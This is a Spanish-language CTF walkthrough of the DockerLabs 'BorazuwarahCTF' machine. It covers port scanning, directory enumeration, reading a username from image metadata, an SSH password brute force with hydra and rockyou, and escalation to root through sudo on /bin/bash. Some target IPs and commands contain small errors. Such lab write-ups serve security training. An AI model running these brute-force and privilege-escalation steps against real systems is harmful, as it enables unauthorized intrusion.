⚠️ Este sitio sigue en constantes cambios

Borazuwarahctf

BorazuwarahCTF

Introducción

En este artículo, explicaré cómo resolví el CTF de la máquina virtual BorazuwarahCTF. Describo paso a paso las técnicas y herramientas utilizadas para encontrar y explotar las vulnerabilidades presentes.

Información de la Máquina Virtual

  • Nombre: BorazuwarahCTF
  • Autor: BorazuwarahCTF
  • Nivel de Dificultad: Muy Fácil
  • Descripción: Fecha de creación: 28/05/2024

Paso 0: Instalación/Despliegue

  • Descargamos la máquina desde la web de DockerLabs (opens in a new tab).
  • Descomprimimos él .zip unzip BorazuwarahCTF.zip
  • ejecutamos el archivo de bash sudo bash auto_deplo.sh BorazuwarahCTF.tar

Paso 1: Reconocimiento

Escaneo de la Red

Al desplegar la máquina me da la IP de la máquina, a sí que me evito el escaneo con Arp

ip image


Después creo una nueva carpeta con el nombre de la máquina para posteriormente entrar al directorio y usar la función mkt(Esta crea 4 carpetas, la llamada content, exploits, nmap y scripts) de mi terminal.

mkdir BorazuwarahCTF
cd BorazuwarahCTF
mkt

Ahora en la carpeta de nmap realizo un escaneo inicial para identificar los puertos abiertos y exportarlos a un archivo.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Para proseguir con la extracción de los puertos que estaban abiertos del archivo

extractPorts allPorts

Ports image

También para el escaneo de los servicios que corren.

nmap -sCV -p80 172.17.0.2 -oN targeted

Resultado: Services image

Enumeración de Servicios

Ahora se enumeran los directorios de la página web que descubrimos por tener abierto el puerto 80.

gobuster dir -u http://172.18.0.2/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 200

Resultados: gobuster image

Esto solo nos da un archivo de index válido el cual tendremos que visitar, resulta que esta página lo único que tiene es una imagen de un kinder sorpresa que en la imagen misma dice: ¡Te quiero!

index image

Nuestro siguiente paso es examinar los metadatos de la imagen, pero primero necesitamos descargarla.

wget http://172.17.02/imagen.jpeg

ya descargada la examinaremos con exiftool:

exiftool http://172.17.02/imagen.jpeg

Y la información resultante nos es útil, ya que podríamos tener un usuario válido. exiftool image

Paso 2: Explotación

Se ha identificado un nombre de usuario válido borazuwarah. Podremos probar un ataque de fuerza bruta al protocolo SSH, ya que contamos con el user.

Este sería el comando a utilizar:

hydra -l borazuwarah -P /usr/share/wordlists/rockyou.txt ssh://172.18.0.2 -t 4

Root image

ya con esto tenemos la contraseña válida para el usuario borazuwarah que es *******. Después podemos hacer login en la máquina a través del protocolo SSH

Elevación de Privilegios

El primer comando para la elevación de privilegios es:

sudo -l

borazuwarah puede ejecutar como cualquier usuario el binario /bin/bash.

Después de esto usamos la herramienta searchbins que nos facilita el acceso a GTFOBins.

searchbins -b bin -f bash

Ahora solo falta escribir el comando que nos arroja, el cual es:

sudo /bin/bash

Con el cual ya tenemos usuario administrador Root image

Notas

  • La máquina tuvo el nivel de dificultad esperado, o sea muy fácil